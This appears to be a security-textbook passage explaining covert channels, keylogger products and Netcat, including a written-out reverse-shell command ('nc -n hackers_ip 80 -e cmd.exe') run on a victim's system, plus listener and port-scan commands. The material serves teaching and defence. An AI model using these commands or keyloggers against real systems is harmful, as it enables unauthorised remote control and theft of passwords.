Overt and Covert Channels

When you are working with Trojans and other malware, you need to be aware of covert and overt channels. As mentioned earlier in the chapter , the difference between the two is that an overt channel is put in place by design and represents the legitimate or intended way for the system or process to be used, whereas a covert channel uses a system or process in away that it was not intended to be used.

The biggest users of covert channels that we have discussed are Trojans. Trojans are designed to stay out of sight and hidden while they send information or receive instructions from another source. Using covert channels means the information and communication may be able to slip past detective mechanisms that are not designed or positioned to be aware of or look for such behavior.

Tools to exploit covert channels include the following:

  • Loki—Originally designed to be a proof of concept on how ICMP traffic can be use as a covert channel. This tool is used to pass information inside ICMP echo packets, which can carry a data payload but typically do not. Because the ability to carry data exists but is not used, this can make an ideal covert channel.
  • ICMP backdoor—Similar to Loki, but instead of using Ping echo packets, it uses Ping replies.
  • 007Shell—Uses ICMP packets to send information, but goes the extra step of formatting the packets so they are a normal size.
  • B0CK—Similar to Loki, but uses Internet Group Management Protocol (IGMP).
  • Reverse World Wide Web (WWW) Tunneling Shell—Creates covert channels through firewalls and proxies by masquerading as normal web traffic.
  • AckCmd—Provides a command shell on Windows systems.

Another powerful way of extracting information from a victim’s system is to use a piece of technology known as a keylogger. Software in this category is designed to capture and report activity in the form of keyboard usage on a target system. When placed on a system, it gives the attacker the ability to monitor all activity on a system and reports back to the attacker. Under the right conditions, this software can capture passwords, confidential information, and other data.

Some of the keystroke recorders include these:

  • IKS Software Keylogger—A Windows-based keylogger that runs in the background on a system at a very low level. Due to the way this software is designed and runs, it is very hard to detect using most conventional means. The program is designed to run at such a low level that it does not show up in process lists or through normal detection methods.
  • Ghost Keylogger—Another Windows-based keylogger that is designed to run silently in the background on a system, much like IKS. The difference between this software and IKS is that it can record activity to an encrypted log that can be e-mailed to the attacker.
  • Spector Pro—Designed to capture keystroke activity, e-mail passwords, chat conversations and logs, and instant messages.
  • Fakegina—An advanced keylogger that is very specific in its choice of targets. This software component is designed to capture usernames and passwords from a Windows system. Specifically, it intercepts the communication between the Winlogon process and the logon GUI in Windows.

Netcat is a simple command-line utility available for Linux, Unix, and Windows platforms. It is designed to read information from connections using TCP or UDP and do simple port redirection on them as configured.

Let’s look at the steps involved to use Netcat to perform port redirection. The first step is for the hacker to set up what is known as a listener on their system. This prepares the attacker’s system to receive the information from the victim’s system. To set up a listener, the command is as follows:

nc -n -v -l -p 80

After this, the attacker needs to execute the following command on the victim’s system to redirect the traffic to their system:

nc -n hackers_ip 80 -e “cmd.exe”

Once this is entered, the net effect is that the command shell on the victim’s system is at the attacker’s command prompt, ready for input as desired.

Of course, Netcat has some other capabilities, including port scanning and placing files on a victim’s system. Port scanning can be accomplished using the following command :

nc -v -z -w1 IPaddress <start port> – <ending port>

This command scans a range of ports as specified.

Netcat isn’t the only tool available to do port redirection. Tools such as Datapipe and Fpipe can perform the same functions, albeit in different ways.

The following is a list of options available for Netcat:

■ Nc –d —Detaches Netcat from the console
■ Nc -l -p [port] —Creates a simple listening TCP port; adding -u places it into UDP mode
■Nc -e [program] —Redirects stdin/stdout from a program

■ Nc -w [timeout] —Sets a timeout before Netcat automatically quits
■ Program | nc —Pipes program output to Netcat
■ Nc | program —Pipes Netcat output to a program
■ Nc -h —Displays help options
■ Nc -v —Puts Netcat into verbose mode
■ Nc -g or nc -G —Specifies source routing flags
■ Nc -t —Used for Telnet negotiation
■ Nc -o [file] —Hex-dumps traffic to a file
■ Nc -z —Used for port scanning